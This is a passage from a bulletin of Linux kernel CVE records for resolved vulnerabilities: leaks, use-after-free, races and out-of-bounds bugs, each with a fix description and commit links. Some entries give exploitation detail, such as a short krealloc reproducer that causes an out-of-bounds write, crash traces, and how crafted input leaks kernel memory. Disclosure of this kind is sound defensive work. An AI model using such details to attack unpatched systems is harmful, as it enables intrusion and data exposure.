| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix memory leak in amdgpu_ras_init() When amdgpu_nbio_ras_sw_init() fails in amdgpu_ras_init(), the function returns directly without freeing the allocated con structure, leading to a memory leak. Fix this by jumping to the release_con label to properly clean up the allocated memory before returning the error code. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45976 | https://git.kernel.org/stable/c/f8a5426652bdadd4a5cb48326d48abbdfebe8153 https://git.kernel.org/stable/c/c11cd77a18115d2cd3f4b6915c4a537b6042f950 https://git.kernel.org/stable/c/2fef8c2ac67e7c1b0409d23653300b134c63e54c https://git.kernel.org/stable/c/3f43e7812b30d6b2e850218f9bb1dae60727fcef https://git.kernel.org/stable/c/ee41e5b63c8210525c936ee637a2c8d185ce873c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbnic: close fw_log race between users and teardown Fixes a theoretical race on fw_log between the teardown path and fw_log write functions. fw_log is written inside fbnic_fw_log_write() and can be reached from the mailbox handler fbnic_fw_msix_intr(), but fw_log is freed before IRQ/MBX teardown during cleanup, resulting in a potential data race of dereferencing a freed/null variable. Possible Interleaving Scenario: CPU0: fbnic_fw_msix_intr() // Entry fbnic_fw_log_write() if (fbnic_fw_log_ready()) // true ... preempt ... CPU1: fbnic_remove() // Entry fbnic_fw_log_free() vfree(log->data_start); log->data_start = NULL; CPU0: continues, walks log->entries or writes to log->data_start The initialization also has an incorrect order problem, as the fw_log is currently allocated after MBX setup during initialization. Fix the problems by adjusting the synchronization order to put initialization in place before the mailbox is enabled, and not cleared until after the mailbox has been disabled. | 2026-05-27 | not yet calculated | CVE-2026-45977 | https://git.kernel.org/stable/c/223cfef4812bdfa5ac5c1aa761cdba03cfe2c9cd https://git.kernel.org/stable/c/5f10ab3643c58a22fbaee92c4701b00fcb4a465d https://git.kernel.org/stable/c/ee5492fd88cfc079c19fbeac78e9e53b7f6c04f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: greybus: lights: avoid NULL deref gb_lights_light_config() stores channel_count before allocating the channels array. If kcalloc() fails, gb_lights_release() iterates the non-zero count and dereferences light->channels, which is NULL. Allocate channels first and only then publish channels_count so the cleanup path can't walk a NULL pointer. | 2026-05-27 | not yet calculated | CVE-2026-45978 | https://git.kernel.org/stable/c/a118724d7641b832fa14323e2733e28ae4834552 https://git.kernel.org/stable/c/3cbe694d235d96f628ec7dc6ae4d8bdddb768699 https://git.kernel.org/stable/c/ba5022162da63059bae36c4fd84d7031f582c71f https://git.kernel.org/stable/c/65f2c608096d766540953d9b170d216aa3b5eb95 https://git.kernel.org/stable/c/01b91cb3e748032fd96bbe0043812b426a52f091 https://git.kernel.org/stable/c/06162d85f830582da6e9e5fcf9c9504d6da9ae0b https://git.kernel.org/stable/c/da46264a7016034a5bbbad034c012ef218b7d0af https://git.kernel.org/stable/c/efcffd9a6ad8d190651498d5eda53bfc7cf683a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: clean up the amdgpu_cs_parser_bos In low memory conditions, kmalloc can fail. In such conditions unlock the mutex for a clean exit. We do not need to call amdgpu_bo_list_put() as it is already handled in amdgpu_cs_parser_fini(). | 2026-05-27 | not yet calculated | CVE-2026-45979 | https://git.kernel.org/stable/c/0905a1d4a5500ecf11f1c0079098e3a351d22163 https://git.kernel.org/stable/c/f025a2b8d93358467b8e8f4b3a617e88c5f02fab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/cio: Fix device lifecycle handling in css_alloc_subchannel() `css_alloc_subchannel()` calls `device_initialize()` before setting up the DMA masks. If `dma_set_coherent_mask()` or `dma_set_mask()` fails, the error path frees the subchannel structure directly, bypassing the device model reference counting. Once `device_initialize()` has been called, the embedded struct device must be released via `put_device()`, allowing the release callback to free the container structure. Fix the error path by dropping the initial device reference with `put_device()` instead of calling `kfree()` directly. This ensures correct device lifetime handling and avoids potential use-after-free or double-free issues. | 2026-05-27 | not yet calculated | CVE-2026-45981 | https://git.kernel.org/stable/c/2b2ad7ad4a28ffdb9f94e6d979b88a5b12b71681 https://git.kernel.org/stable/c/b1d4e6fb241672850296956c4d782a69363a3807 https://git.kernel.org/stable/c/fd295a75d828c11acfcc6869c2a12cdaaf9b7722 https://git.kernel.org/stable/c/abb6e07f46a740cda4f07d1b561ae4eaa7a1df42 https://git.kernel.org/stable/c/f96c5ccf95ae5f27218c1ce2d6a3ad2d3e105424 https://git.kernel.org/stable/c/6715560527e343a387e4a0d2e6c401748e89fa55 https://git.kernel.org/stable/c/c35cfbb5341ba05ad1b4476ffc3c21cc3ff8f603 https://git.kernel.org/stable/c/f65c75b0b9b5a390bc3beadcde0a6fbc3ad118f7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPICA: Fix NULL pointer dereference in acpi_ev_address_space_dispatch() Cover a missed execution path with a new check. | 2026-05-27 | not yet calculated | CVE-2026-45982 | https://git.kernel.org/stable/c/7d99cbe717c1b15a66559215df32312d8cf7e525 https://git.kernel.org/stable/c/f2cf475d23b8486dfa414f7ac09f918ffd3c32a5 https://git.kernel.org/stable/c/cce354524da4d10fd2c7eb835e2e4e8ab8c0ce97 https://git.kernel.org/stable/c/b24595b86920911d2b04f862422b896a0620e9ad https://git.kernel.org/stable/c/56024dbe8c76cff22f53ba81a95d9efd4d0c9c44 https://git.kernel.org/stable/c/f851e03bce968ff9b3faad1b616062e1244fd38d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: never defer requests during idmap lookup During v4 request compound arg decoding, some ops (e.g. SETATTR) can trigger idmap lookup upcalls. When those upcall responses get delayed beyond the allowed time limit, cache_check() will mark the request for deferral and cause it to be dropped. This prevents nfs4svc_encode_compoundres from being executed, and thus the session slot flag NFSD4_SLOT_INUSE never gets cleared. Subsequent client requests will fail with NFSERR_JUKEBOX, given that the slot will be marked as in-use, making the SEQUENCE op fail. Fix this by making sure that the RQ_USEDEFERRAL flag is always clear during nfs4svc_decode_compoundargs(), since no v4 request should ever be deferred. | 2026-05-27 | not yet calculated | CVE-2026-45983 | https://git.kernel.org/stable/c/b9abb760db20504240a7147f27934d900cd80b23 https://git.kernel.org/stable/c/3a72c7dedc99b321e0f267e4e999e5baf07c4593 https://git.kernel.org/stable/c/99e17b20fddac19a228d213e00f6b9e1c10daff9 https://git.kernel.org/stable/c/243f71ed873ff3feeb6f9b5cb145d63f7188b4c4 https://git.kernel.org/stable/c/063a6f22478ef929625000a2caf54667725c1dfd https://git.kernel.org/stable/c/d75ec4504a4340b033b15cad0303988b3089dd93 https://git.kernel.org/stable/c/8dff54fe88c0dcd4c55bff9fc2fa6ca968290826 https://git.kernel.org/stable/c/f9c206cdc4266caad6a9a7f46341420a10f03ccb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: don't set EXT4_GET_BLOCKS_CONVERT when splitting before submitting I/O When allocating blocks during within-EOF DIO and writeback with dioread_nolock enabled, EXT4_GET_BLOCKS_PRE_IO was set to split an existing large unwritten extent. However, EXT4_GET_BLOCKS_CONVERT was also set when calling ext4_split_convert_extents(), which may result in stale data issues. Assume we have an unwritten extent, and then DIO writes the second half. [UUUUUUUUUUUUUUUU] on-disk extent U: unwritten extent [UUUUUUUUUUUUUUUU] extent status tree |<- ->| ----> dio write this range First, ext4_iomap_alloc() calls ext4_map_blocks() with the EXT4_GET_BLOCKS_PRE_IO, EXT4_GET_BLOCKS_UNWRIT_EXT and EXT4_GET_BLOCKS_CREATE flags set. ext4_map_blocks() finds this extent and calls ext4_split_convert_extents() with EXT4_GET_BLOCKS_CONVERT and the above flags set. Then, ext4_split_convert_extents() calls ext4_split_extent() with the EXT4_EXT_MAY_ZEROOUT, EXT4_EXT_MARK_UNWRIT2 and EXT4_EXT_DATA_VALID2 flags set, and it calls ext4_split_extent_at() to split the second half with the EXT4_EXT_DATA_VALID2, EXT4_EXT_MARK_UNWRIT1, EXT4_EXT_MAY_ZEROOUT and EXT4_EXT_MARK_UNWRIT2 flags set. However, ext4_split_extent_at() fails to insert the extent due to a temporary lack of space (-ENOSPC). It zeroes out the first half but converts the entire on-disk extent to written because the EXT4_EXT_DATA_VALID2 flag is set, leaving the second half as unwritten in the extent status tree. [0000000000SSSSSS] data S: stale data, 0: zeroed [WWWWWWWWWWWWWWWW] on-disk extent W: written extent [WWWWWWWWWWUUUUUU] extent status tree Finally, if the DIO fails to write data to the disk, the stale data in the second half will be exposed once the cached extent entry is gone. Fix this issue by not passing EXT4_GET_BLOCKS_CONVERT when splitting an unwritten extent before submitting I/O, and make ext4_split_convert_extents() zero out the entire extent range for this case, and also mark the extent in the extent status tree for consistency. | 2026-05-27 | not yet calculated | CVE-2026-45985 | https://git.kernel.org/stable/c/77e407967cd872cd75d7e4a691908e49c8e6b4d4 https://git.kernel.org/stable/c/37555690f39f78ef69af347d9aff897e07445949 https://git.kernel.org/stable/c/67cdb7bd7442bd3cdc6d6088bbb2df9be2fe936c https://git.kernel.org/stable/c/2920ec61c98b9476781359f05b94da84e80f54d4 https://git.kernel.org/stable/c/2698731d25823267c29190cb578da9296a0c0d7b https://git.kernel.org/stable/c/716e7439a5a9b18c3ff882c2f8c834b9ced1aaec https://git.kernel.org/stable/c/feaf2a80e78f89ee8a3464126077ba8683b62791 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: ccree - fix a memory leak in cc_mac_digest() Add cc_unmap_result() if cc_map_hash_request_final() fails to prevent potential memory leak. | 2026-05-27 | not yet calculated | CVE-2026-45986 | https://git.kernel.org/stable/c/3061c9bfb3f5b3522ab174e2fa7473b24422d1c6 https://git.kernel.org/stable/c/22f1dd4ca3bfe77db52cc7df3cc353dc114aab8b https://git.kernel.org/stable/c/910f335786a0a0f0b46c3c8c19a13d25cb4454b6 https://git.kernel.org/stable/c/502440c235fe34cee02b24d7f893841f7565b3bc https://git.kernel.org/stable/c/02c64052fad03699b9c6d1df2f9b444d17e4ac50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Sync interrupt shadow to cached vmcb12 after VMRUN of L2 After VMRUN in guest mode, nested_sync_control_from_vmcb02() syncs fields written by the CPU from vmcb02 to the cached vmcb12. This is because the cached vmcb12 is used as the authoritative copy of some of the controls, and is the payload when saving/restoring nested state. int_state is also written by the CPU, specifically bit 0 (i.e. SVM_INTERRUPT_SHADOW_MASK) for nested VMs, but it is not synced to the cached vmcb12. This does not cause a problem if KVM_SET_NESTED_STATE precedes KVM_SET_VCPU_EVENTS in the restore path, as an interrupt shadow would be correctly restored to vmcb02 (KVM_SET_VCPU_EVENTS overwrites what KVM_SET_NESTED_STATE restored in int_state). However, if KVM_SET_VCPU_EVENTS precedes KVM_SET_NESTED_STATE, an interrupt shadow would be restored into vmcb01 instead of vmcb02. This would mostly be benign for L1 (delays an interrupt), but not for L2. For L2, the vCPU could hang (e.g. if a wakeup interrupt is delivered before a HLT that should have been in an interrupt shadow). Sync int_state to the cached vmcb12 in nested_sync_control_from_vmcb02() to avoid this problem. With that, KVM_SET_NESTED_STATE restores the correct interrupt shadow state, and if KVM_SET_VCPU_EVENTS follows it would overwrite it with the same value. | 2026-05-27 | not yet calculated | CVE-2026-45987 | https://git.kernel.org/stable/c/1709418535a8df95532999d61b03d59975280258 https://git.kernel.org/stable/c/2f950eeb27af6885416232761700b8820cae0a61 https://git.kernel.org/stable/c/497f6af9679fc9c6ce2f438e11ed5d51b1aa8297 https://git.kernel.org/stable/c/e0377e52f3c10ee572732d11b04625b7f517a862 https://git.kernel.org/stable/c/03bee264f8ebfd39e0254c98e112d033a7aa9055 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: of: unittest: fix use-after-free in testdrv_probe() The function testdrv_probe() retrieves the device_node from the PCI device, applies an overlay, and then immediately calls of_node_put(dn). This releases the reference held by the PCI core, potentially freeing the node if the reference count drops to zero. Later, the same freed pointer 'dn' is passed to of_platform_default_populate(), leading to a use-after-free. The reference to pdev->dev.of_node is owned by the device model and should not be released by the driver. Remove the erroneous of_node_put() to prevent premature freeing. | 2026-05-27 | not yet calculated | CVE-2026-45989 | https://git.kernel.org/stable/c/0ba03e06f037df704d9b032e36d417633e2326bc https://git.kernel.org/stable/c/d68347b07b9801791c9eaab8f772770b52b8cd5c https://git.kernel.org/stable/c/5b6122a67a295f8a08b7c18d908a1bd974dfaec8 https://git.kernel.org/stable/c/6b2023286d2c6ed3bf964fb92e34c9c14d42eb69 https://git.kernel.org/stable/c/07fd339b2c253205794bea5d9b4b7548a4546c56 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: slub: fix data loss and overflow in krealloc() Commit 2cd8231796b5 ("mm/slub: allow to set node and align in k[v]realloc") introduced the ability to force a reallocation if the original object does not satisfy new alignment or NUMA node, even when the object is being shrunk. This introduced two bugs in the reallocation fallback path: 1. Data loss during NUMA migration: The jump to 'alloc_new' happens before 'ks' and 'orig_size' are initialized. As a result, the memcpy() in the 'alloc_new' block would copy 0 bytes into the new allocation. 2. Buffer overflow during shrinking: When shrinking an object while forcing a new alignment, 'new_size' is smaller than the old size. However, the memcpy() used the old size ('orig_size ?: ks'), leading to an out-of-bounds write. The same overflow bug exists in the kvrealloc() fallback path, where the old bucket size ksize(p) is copied into the new buffer without being bounded by the new size. A simple reproducer: // e.g. add to lkdtm as KREALLOC_SHRINK_OVERFLOW while (1) { void *p = kmalloc(128, GFP_KERNEL); p = krealloc_node_align(p, 64, 256, GFP_KERNEL, NUMA_NO_NODE); kfree(p); } demonstrates the issue: ================================================================== BUG: KFENCE: out-of-bounds write in memcpy_orig+0x68/0x130 Out-of-bounds write at 0xffff8883ad757038 (120B right of kfence-#47): memcpy_orig+0x68/0x130 krealloc_node_align_noprof+0x1c8/0x340 lkdtm_KREALLOC_SHRINK_OVERFLOW+0x8c/0xc0 [lkdtm] lkdtm_do_action+0x3a/0x60 [lkdtm] ... kfence-#47: 0xffff8883ad756fc0-0xffff8883ad756fff, size=64, cache=kmalloc-64 allocated by task 316 on cpu 7 at 97.680481s (0.021813s ago): krealloc_node_align_noprof+0x19c/0x340 lkdtm_KREALLOC_SHRINK_OVERFLOW+0x8c/0xc0 [lkdtm] lkdtm_do_action+0x3a/0x60 [lkdtm] ... ================================================================== Fix it by moving the old size calculation to the top of __do_krealloc() and bounding all copy lengths by the new allocation size. | 2026-05-27 | not yet calculated | CVE-2026-45990 | https://git.kernel.org/stable/c/38387ccc0fbe38d14fb4c2ad7ee1d7404e5e59fd https://git.kernel.org/stable/c/550fa6b5aabb096554536ac1e3ec96b76cbb35fd https://git.kernel.org/stable/c/082a6d03a2d685a83a332666b500ad3966349588 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: caiaq: Fix potentially leftover ep1_in_urb at error path The previous fix for handling the error from setup_card() missed that an internal URB cdev->ep1_in_urb might have been already submitted beforehand. In the normal case, this URB gets killed at the disconnection, but in the error path, we didn't do it, hence there can be a potential leak. Fix it in the error path for setup_card(), too. | 2026-05-27 | not yet calculated | CVE-2026-45992 | https://git.kernel.org/stable/c/be62c8bb03b6aec3790a943d4a7567d4d73b8be9 https://git.kernel.org/stable/c/e0fb842af7052f0ab9e709db0c59300aa4051fc0 https://git.kernel.org/stable/c/1d160e30aa42b7c41163e51366bb34432367260d https://git.kernel.org/stable/c/438ab932dc6fef5b001dfeba08a18a491edc8f7b https://git.kernel.org/stable/c/0a7b5221b5b51cc798fcfc3be00d02eade149d69 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: LoongArch: Add spectre boundary for syscall dispatch table The LoongArch syscall number is directly controlled by userspace, but does not have an array_index_nospec() boundary to prevent access past the syscall function pointer tables. | 2026-05-27 | not yet calculated | CVE-2026-45993 | https://git.kernel.org/stable/c/108f2cd13577a410c0ad6ea00708596d9d0dfc90 https://git.kernel.org/stable/c/07040904ad217545be096d4280ed33c02f6a3750 https://git.kernel.org/stable/c/85cbf7fb568af5358aae61925c4e66b8f5e1439d https://git.kernel.org/stable/c/bc84a109c2082dd0c4b38e8d923c046b41977533 https://git.kernel.org/stable/c/0c965d2784fbbd7f8e3b96d875c9cfdf7c00da3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ibmasm: fix OOB reads in command_file_write due to missing size checks The command_file_write() handler allocates a kernel buffer of exactly count bytes and copies user data into it, but does not validate the buffer against the dot command protocol before passing it to get_dot_command_size() and get_dot_command_timeout(). Since both the allocation size (count) and the header fields (command_size, data_size) are independently user-controlled, an attacker can cause get_dot_command_size() to return a value exceeding the allocation, triggering OOB reads in get_dot_command_timeout() and an out-of-bounds memcpy_toio() that leaks kernel heap memory to the service processor. Fix with two guards: reject writes smaller than sizeof(struct dot_command_header) before allocation, then after copying user data reject commands where the buffer is smaller than the total size declared by the header (sizeof(header) + command_size + data_size). This ensures all subsequent header and payload field accesses stay within the buffer. | 2026-05-27 | not yet calculated | CVE-2026-45994 | https://git.kernel.org/stable/c/a672682d39dd34e2b5ba4feb436723bed65125ff https://git.kernel.org/stable/c/aefc1a97da17d8309974690c8a03e439a91ebb1c https://git.kernel.org/stable/c/ee5737891464030a189837467df3b81a273718ad https://git.kernel.org/stable/c/d0fb4d1dc43f8d5179917a2daaa82680993d4cdf https://git.kernel.org/stable/c/0eb09f737428e482a32a2e31e5e223f2b35a71d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/zcrx: fix user_struct uaf io_free_rbuf_ring() uses a struct user_struct, which io_zcrx_ifq_free() puts down before destroying the ring. | 2026-05-27 | not yet calculated | CVE-2026-45995 | https://git.kernel.org/stable/c/9feb88eeda6d288f93fcfb6bca563f89e316479d https://git.kernel.org/stable/c/0fcccfd87152f957fa8312b841f6efef42a05a20 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: imx: fix use-after-free on unbind The SPI subsystem frees the controller and any subsystem allocated driver data as part of deregistration (unless the allocation is device managed). Take another reference before deregistering the controller so that the driver data is not freed until the driver is done with it. | 2026-05-27 | not yet calculated | CVE-2026-45996 | https://git.kernel.org/stable/c/f99165ef067723221472ce1aff632bc74f562643 https://git.kernel.org/stable/c/385a330083f8dd47c15b02e9a83aef9234a37003 https://git.kernel.org/stable/c/132e47030b0b5e398e0da6c59df5a5dae9b52cff https://git.kernel.org/stable/c/aa9025a498036b6012769f7af36d421385386c17 https://git.kernel.org/stable/c/1c78c2002380a1fe31bfb01a3d5f29809e55a096 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: sd: fix missing put_disk() when device_add(&disk_dev) fails If device_add(&sdkp->disk_dev) fails, put_device() runs scsi_disk_release(), which frees the scsi_disk but leaves the gendisk referenced. The device_add_disk() error path in sd_probe() calls put_disk(gd); call put_disk(gd) here to mirror that cleanup. | 2026-05-27 | not yet calculated | CVE-2026-45997 | https://git.kernel.org/stable/c/262152ec37101f9dc524743ccdbd6c7641d14573 https://git.kernel.org/stable/c/b64b4f499801b12d0e2785447e4df6c164c608a9 https://git.kernel.org/stable/c/13e550fbfccdb311e76ec96892dfe35f0dba0657 https://git.kernel.org/stable/c/a95d38c5701431bfc826e7b18acc0785919d5c88 https://git.kernel.org/stable/c/1e111c4b3a726df1254670a5cc4868cedb946d37 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix potential UAF after skb_unshare() failure If skb_unshare() fails to unshare a packet due to allocation failure in rxrpc_input_packet(), the skb pointer in the parent (rxrpc_io_thread()) will be NULL'd out. This will likely cause the call to trace_rxrpc_rx_done() to oops. Fix this by moving the unsharing down to where rxrpc_input_call_event() calls rxrpc_input_call_packet(). There are a number of places prior to that where we ignore DATA packets for a variety of reasons (such as the call already being complete) for which an unshare is then avoided. And with that, rxrpc_input_packet() doesn't need to take a pointer to the pointer to the packet, so change that to just a pointer. | 2026-05-27 | not yet calculated | CVE-2026-45998 | https://git.kernel.org/stable/c/e3bf143b1e98fb3d6d9e6825bcd683974d478e8c https://git.kernel.org/stable/c/bf20f46d94f1db38e6ffc0ca204a5fe0de01b495 https://git.kernel.org/stable/c/996b0487b3cdda4c91811dbb1c9564626bc840bd https://git.kernel.org/stable/c/8fde6296c4d4da2be7ab761305ab7f232b94eefd https://git.kernel.org/stable/c/1f2740150f904bfa60e4bad74d65add3ccb5e7f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix conn-level packet handling to unshare RESPONSE packets The security operations that verify the RESPONSE packets decrypt bits of it in place - however, the sk_buff may be shared with a packet sniffer, which would lead to the sniffer seeing an apparently corrupt packet (actually decrypted). Fix this by handing a copy of the packet off to the specific security handler if the packet was cloned. | 2026-05-27 | not yet calculated | CVE-2026-46000 | https://git.kernel.org/stable/c/c0428a22daf69714dc042b67ea759956b74c74e5 https://git.kernel.org/stable/c/98a2046d155f73f6cf5d2c493c5e09b4963e2e12 https://git.kernel.org/stable/c/ca71ac2de389b01eecdc48bfafbdf073ec232044 https://git.kernel.org/stable/c/d9b93a0f57ca5f6831bfaa34014b6cd705564a00 https://git.kernel.org/stable/c/24481a7f573305706054c59e275371f8d0fe919f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (pt5161l) Fix bugs in pt5161l_read_block_data() Fix two bugs in pt5161l_read_block_data(): 1. Buffer overrun: The local buffer rbuf is declared as u8 rbuf[24], but i2c_smbus_read_block_data() can return up to I2C_SMBUS_BLOCK_MAX (32) bytes. The i2c-core copies the data into the caller's buffer before the return value can be checked, so the post-read length validation does not prevent a stack overrun if a device returns more than 24 bytes. Resize the buffer to I2C_SMBUS_BLOCK_MAX. 2. Unexpected positive return on length mismatch: When all three retries are exhausted because the device returns data with an unexpected length, i2c_smbus_read_block_data() returns a positive byte count. The function returns this directly, and callers treat any non-negative return as success, processing stale or incomplete buffer contents. Return -EIO when retries are exhausted with a positive return value, preserving the negative error code on I2C failure. | 2026-05-27 | not yet calculated | CVE-2026-46001 | https://git.kernel.org/stable/c/7eccabff1c9ec15e4b6fe186d5c147b13a9cdb4e https://git.kernel.org/stable/c/95d48e37a1304d6148406c799479c0fb505aefa7 https://git.kernel.org/stable/c/a11aa9c5fd9dfe62be7cfec1f2a7546afb77254c https://git.kernel.org/stable/c/24c73e93d6a756e1b8626bb259d2e07c5b89b370 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext2: reject inodes with zero i_nlink and valid mode in ext2_iget() ext2_iget() already rejects inodes with i_nlink == 0 when i_mode is zero or i_dtime is set, treating them as deleted. However, the case of i_nlink == 0 with a non-zero mode and zero dtime slips through. Since ext2 has no orphan list, such a combination can only result from filesystem corruption - a legitimate inode deletion always sets either i_dtime or clears i_mode before freeing the inode. A crafted image can exploit this gap to present such an inode to the VFS, which then triggers WARN_ON inside drop_nlink() (fs/inode.c) via ext2_unlink(), ext2_rename() and ext2_rmdir(): WARNING: CPU: 3 PID: 609 at fs/inode.c:336 drop_nlink+0xad/0xd0 fs/inode.c:336 CPU: 3 UID: 0 PID: 609 Comm: syz-executor Not tainted 6.12.77+ #1 Call Trace: <TASK> inode_dec_link_count include/linux/fs.h:2518 [inline] ext2_unlink+0x26c/0x300 fs/ext2/namei.c:295 vfs_unlink+0x2fc/0x9b0 fs/namei.c:4477 do_unlinkat+0x53e/0x730 fs/namei.c:4541 __x64_sys_unlink+0xc6/0x110 fs/namei.c:4587 do_syscall_64+0xf5/0x220 arch/x86/entry/common.c:78 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> WARNING: CPU: 0 PID: 646 at fs/inode.c:336 drop_nlink+0xad/0xd0 fs/inode.c:336 CPU: 0 UID: 0 PID: 646 Comm: syz.0.17 Not tainted 6.12.77+ #1 Call Trace: <TASK> inode_dec_link_count include/linux/fs.h:2518 [inline] ext2_rename+0x35e/0x850 fs/ext2/namei.c:374 vfs_rename+0xf2f/0x2060 fs/namei.c:5021 do_renameat2+0xbe2/0xd50 fs/namei.c:5178 __x64_sys_rename+0x7e/0xa0 fs/namei.c:5223 do_syscall_64+0xf5/0x220 arch/x86/entry/common.c:78 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> WARNING: CPU: 0 PID: 634 at fs/inode.c:336 drop_nlink+0xad/0xd0 fs/inode.c:336 CPU: 0 UID: 0 PID: 634 Comm: syz-executor Not tainted 6.12.77+ #1 Call Trace: <TASK> inode_dec_link_count include/linux/fs.h:2518 [inline] ext2_rmdir+0xca/0x110 fs/ext2/namei.c:311 vfs_rmdir+0x204/0x690 fs/namei.c:4348 do_rmdir+0x372/0x3e0 fs/namei.c:4407 __x64_sys_unlinkat+0xf0/0x130 fs/namei.c:4577 do_syscall_64+0xf5/0x220 arch/x86/entry/common.c:78 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> Extend the existing i_nlink == 0 check to also catch this case, reporting the corruption via ext2_error() and returning -EFSCORRUPTED. This rejects the inode at load time and prevents it from reaching any of the namei.c paths. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2026-05-27 | not yet calculated | CVE-2026-46002 | https://git.kernel.org/stable/c/32e0b925572686399243834ec99e2a9d85c62eae https://git.kernel.org/stable/c/d3af04a43db86379df7438bf8bade71685b8a239 https://git.kernel.org/stable/c/2dde6377ab2e46bb80cf066c659ef016f3ad7a9b https://git.kernel.org/stable/c/470264bbec499e276a89a6431144ae58f411ea4d https://git.kernel.org/stable/c/25947cc5b2374cd5bf627fe3141496444260d04f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Limit the total number of nodes Currently, the nameserver doesn't limit the number of nodes it handles. This can be an attack vector if a malicious client starts registering random nodes, leading to memory exhaustion. Hence, limit the maximum number of nodes to 64. Note that the limit of 64 is chosen based on the current platform requirements. If requirements change in the future, this limit can be increased. | 2026-05-27 | not yet calculated | CVE-2026-46003 | https://git.kernel.org/stable/c/4c46413661431aa60fb134cd4ecdf8beaa39f824 https://git.kernel.org/stable/c/4665a29c08e1b36bc9db4814f9dde3d23e8fd1b0 https://git.kernel.org/stable/c/5cf6d5e5e3b804a44692fbf548a5179442e2e923 https://git.kernel.org/stable/c/8022876894d09ae485b499058c3357da683bcc5d https://git.kernel.org/stable/c/27d5e84e810b0849d08b9aec68e48570461ce313 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: caiaq: Handle probe errors properly The probe procedure of setup_card() in the caiaq driver doesn't treat the error cases gracefully, e.g. the error from snd_card_register() calls snd_card_free() but continues. This would lead to a UAF for the further calls like snd_usb_caiaq_control_init(), as Berk suggested in another patch in the link below. However, the problem is not only that; in general, this function drops all error handling (as it's a void function) although its caller can propagate an error to snd_probe(), which eventually calls snd_card_free() as a proper error path. That said, we should treat each error case in setup_card(), and just return the error code promptly, which is then handled later as a fatal error in snd_probe(). This patch achieves it by changing setup_card() to return an error code. Also, the superfluous snd_card_free() call is removed. Note that card->private_free can still be set safely when returning an error. All functions called in card_free() have checks of the unassigned resources or NULL checks. | 2026-05-27 | not yet calculated | CVE-2026-46004 | https://git.kernel.org/stable/c/f537e3ad69609f6924a4db6b4a7f6561f5288bdd https://git.kernel.org/stable/c/6251e3e256337a30160ef59ab1580dde4d1acd28 https://git.kernel.org/stable/c/e59ecd4ee3a450db6cb4e4ecaa3efdd593f80056 https://git.kernel.org/stable/c/096dd8519cf2f768e9e14f224b627f7aaee1a9c5 https://git.kernel.org/stable/c/28abd224db4a49560b452115bca3672a20e45b2f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: fix a resource leak in xfs_alloc_buftarg() In the error path, call fs_put_dax() to drop the DAX device reference. | 2026-05-27 | not yet calculated | CVE-2026-46005 | https://git.kernel.org/stable/c/82fb9da6477d08bdab954dc7bc081a41f2f9cae6 https://git.kernel.org/stable/c/28a6c132b8c6e5eeefa889c4fb43d65b12989d48 https://git.kernel.org/stable/c/5c293a1e1ef0f838772d20ae8afae4cbd87cd3f9 https://git.kernel.org/stable/c/5804cb507233ed767a83ac70527b2f6c4566ec75 https://git.kernel.org/stable/c/29a7b2614357393b176ef06ba5bc3ff5afc8df69 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (powerz) Avoid cacheline sharing for DMA buffer Depending on the architecture the transfer buffer may share a cacheline with the following mutex. As the buffer may be used for DMA, that is problematic. Use the high-level DMA helpers to make sure that cacheline sharing can not happen. Also drop the comment, as the helpers are documentation enough. https://sashiko.dev/#/message/20260408175814.934BFC19421%40smtp.kernel.org | 2026-05-27 | not yet calculated | CVE-2026-46007 | https://git.kernel.org/stable/c/270e5c576a6e30f6b337fa91d35b44c241297533 https://git.kernel.org/stable/c/1869da3efe703b016b23d4885f3fe6c1751959c6 https://git.kernel.org/stable/c/2fa2273016a0483217404cfe330967c4ac6832a9 https://git.kernel.org/stable/c/3023c050af3600bf451153335dea5e073c9a3088 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: fix damos_walk() vs kdamond_fn() exit race When the kdamond_fn() main loop is finished, the function cancels the remaining damos_walk() request and unsets damon_ctx->kdamond so that API callers and API functions themselves can see the context is terminated. damos_walk() adds the caller's request to the queue first. After that, it checks if the kdamond of the damon_ctx is still running (damon_ctx->kdamond is set). Only if the kdamond is running, damos_walk() starts waiting for the kdamond's handling of the newly added request. The damos_walk() request registration and damon_ctx->kdamond unset are protected by different mutexes, though. Hence, damos_walk() could race with the damon_ctx->kdamond unset, and result in deadlocks. For example, let's suppose kdamond successfully finished the damos_walk() request cancelling. Right after that, damos_walk() is called for the context. It registers the new request, and sees the context is still running, because the damon_ctx->kdamond unset is not yet done. Hence the damos_walk() caller starts waiting for the handling of the request. However, the 